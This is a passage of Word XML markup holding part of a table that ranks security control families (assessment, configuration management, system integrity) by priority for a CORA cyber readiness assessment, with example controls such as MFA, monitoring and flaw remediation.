              <w:t>Focuses on perimeter authentication and lateral movement barriers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="60AE80F3" w14:textId="77777777" w:rsidR="009151D7" w:rsidRDefault="00D66D8A" w:rsidP="009151D7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009151D7">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Account management</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72BCE521" w14:textId="77777777" w:rsidR="009151D7" w:rsidRDefault="009151D7" w:rsidP="009151D7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7BCF82A8" w14:textId="77777777" w:rsidR="009151D7" w:rsidRDefault="00D66D8A" w:rsidP="009151D7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009151D7">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>MFA on boundary gateways</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F02F645" w14:textId="77777777" w:rsidR="009151D7" w:rsidRPr="009151D7" w:rsidRDefault="009151D7" w:rsidP="009151D7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="742E4599" w14:textId="62D46030" w:rsidR="00D66D8A" w:rsidRPr="009151D7" w:rsidRDefault="009151D7" w:rsidP="009151D7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
            <w:r w:rsidR="00D66D8A" w:rsidRPr="009151D7">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ession termination.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66D8A" w:rsidRPr="005D3438" w14:paraId="4AF9DDCB" w14:textId="77777777" w:rsidTr="009151D7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2691AEE1" w14:textId="4D519BC4" w:rsidR="00D66D8A" w:rsidRPr="005D3438" w:rsidRDefault="00D66D8A" w:rsidP="005D3438">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D3438">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CA (Assessment &amp; Authorization)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4584AE20" w14:textId="77777777" w:rsidR="009151D7" w:rsidRPr="009151D7" w:rsidRDefault="00D66D8A" w:rsidP="009151D7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009151D7">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="EE0000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CF85B42" w14:textId="77777777" w:rsidR="009151D7" w:rsidRPr="009151D7" w:rsidRDefault="009151D7" w:rsidP="009151D7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0AB927B5" w14:textId="0E18EAE7" w:rsidR="009151D7" w:rsidRDefault="00D66D8A" w:rsidP="009151D7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009151D7">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Governs continuous monitoring capabilities.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18716A74" w14:textId="77777777" w:rsidR="009151D7" w:rsidRDefault="009151D7" w:rsidP="009151D7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3DEEA423" w14:textId="7CF2D3ED" w:rsidR="00D66D8A" w:rsidRPr="009151D7" w:rsidRDefault="00D66D8A" w:rsidP="009151D7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009151D7">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CORA penalizes stagnant, non-automated tracking environments.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6751FC83" w14:textId="77777777" w:rsidR="009151D7" w:rsidRDefault="00D66D8A" w:rsidP="009151D7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009151D7">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Continuous monitoring strategies</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="700ACF46" w14:textId="77777777" w:rsidR="009151D7" w:rsidRDefault="009151D7" w:rsidP="009151D7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="071BA79D" w14:textId="69BE9F06" w:rsidR="00D66D8A" w:rsidRPr="009151D7" w:rsidRDefault="009151D7" w:rsidP="009151D7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
            <w:r w:rsidR="00D66D8A" w:rsidRPr="009151D7">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>achine-to-machine telemetry established</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66D8A" w:rsidRPr="005D3438" w14:paraId="70DF7C61" w14:textId="77777777" w:rsidTr="009151D7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6EBE9194" w14:textId="5F354B63" w:rsidR="00D66D8A" w:rsidRPr="005D3438" w:rsidRDefault="00D66D8A" w:rsidP="005D3438">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D3438">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CM (Configuration Change Management)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3DFCC6CA" w14:textId="77777777" w:rsidR="009151D7" w:rsidRPr="009151D7" w:rsidRDefault="00D66D8A" w:rsidP="009151D7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009151D7">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E55027"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6571E4B2" w14:textId="77777777" w:rsidR="009151D7" w:rsidRPr="009151D7" w:rsidRDefault="009151D7" w:rsidP="009151D7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="580DBF9A" w14:textId="256316E4" w:rsidR="009151D7" w:rsidRDefault="00D66D8A" w:rsidP="009151D7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009151D7">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Correlates directly to “Cyber Maintenance” (50% of overall CORA score).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1864877A" w14:textId="77777777" w:rsidR="009151D7" w:rsidRDefault="009151D7" w:rsidP="009151D7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1FE3DCFE" w14:textId="13665669" w:rsidR="00D66D8A" w:rsidRPr="009151D7" w:rsidRDefault="00D66D8A" w:rsidP="009151D7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009151D7">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Tracks compliance drift and baseline security control enforcement.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7088C0FF" w14:textId="77777777" w:rsidR="009151D7" w:rsidRDefault="00D66D8A" w:rsidP="009151D7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009151D7">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Least functionality</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="444A1AC3" w14:textId="77777777" w:rsidR="009151D7" w:rsidRDefault="009151D7" w:rsidP="009151D7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4EEEBAF4" w14:textId="77777777" w:rsidR="009151D7" w:rsidRDefault="009151D7" w:rsidP="009151D7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>U</w:t>
            </w:r>
            <w:r w:rsidR="00D66D8A" w:rsidRPr="009151D7">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>nauthorized software blocking</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72A9AB4D" w14:textId="77777777" w:rsidR="009151D7" w:rsidRPr="009151D7" w:rsidRDefault="009151D7" w:rsidP="009151D7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="03A1CA6D" w14:textId="37870060" w:rsidR="00D66D8A" w:rsidRPr="009151D7" w:rsidRDefault="00D66D8A" w:rsidP="009151D7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009151D7">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>STIG/SRG validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66D8A" w:rsidRPr="005D3438" w14:paraId="48181E57" w14:textId="77777777" w:rsidTr="009151D7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="48B38BB3" w14:textId="51F7B823" w:rsidR="00D66D8A" w:rsidRPr="005D3438" w:rsidRDefault="00D66D8A" w:rsidP="005D3438">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D3438">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>SI (System &amp; Information Integrity)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="290AC5B5" w14:textId="77777777" w:rsidR="009151D7" w:rsidRPr="009151D7" w:rsidRDefault="00D66D8A" w:rsidP="009151D7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009151D7">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F90101"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Extremely High</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C8DDD09" w14:textId="77777777" w:rsidR="009151D7" w:rsidRPr="009151D7" w:rsidRDefault="009151D7" w:rsidP="009151D7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4D91D081" w14:textId="1D4F76D0" w:rsidR="009151D7" w:rsidRDefault="00D66D8A" w:rsidP="009151D7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009151D7">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Maps directly to Key Indicators of Risk (KIORs).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CBE39C8" w14:textId="77777777" w:rsidR="009151D7" w:rsidRDefault="009151D7" w:rsidP="009151D7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2B03329D" w14:textId="779FEE9C" w:rsidR="00D66D8A" w:rsidRPr="009151D7" w:rsidRDefault="00D66D8A" w:rsidP="009151D7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009151D7">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Flaws here mean active exploitability by adversaries and are deemed severe and critical in the wild.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3CBFACA9" w14:textId="77777777" w:rsidR="009151D7" w:rsidRDefault="00D66D8A" w:rsidP="009151D7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009151D7">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Flaw remediation (pathing timelines)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B7EBFA2" w14:textId="77777777" w:rsidR="009151D7" w:rsidRDefault="009151D7" w:rsidP="009151D7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="34B969AF" w14:textId="50E786EA" w:rsidR="00D66D8A" w:rsidRPr="009151D7" w:rsidRDefault="009151D7" w:rsidP="009151D7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
            <w:r w:rsidR="00D66D8A" w:rsidRPr="009151D7">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>alicious code protection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="29E25403" w14:textId="77777777" w:rsidR="00D66D8A" w:rsidRPr="005D3438" w:rsidRDefault="00D66D8A" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="038A4539" w14:textId="77777777" w:rsidR="00D66D8A" w:rsidRPr="005D3438" w:rsidRDefault="00D66D8A" w:rsidP="005D3438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3438">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
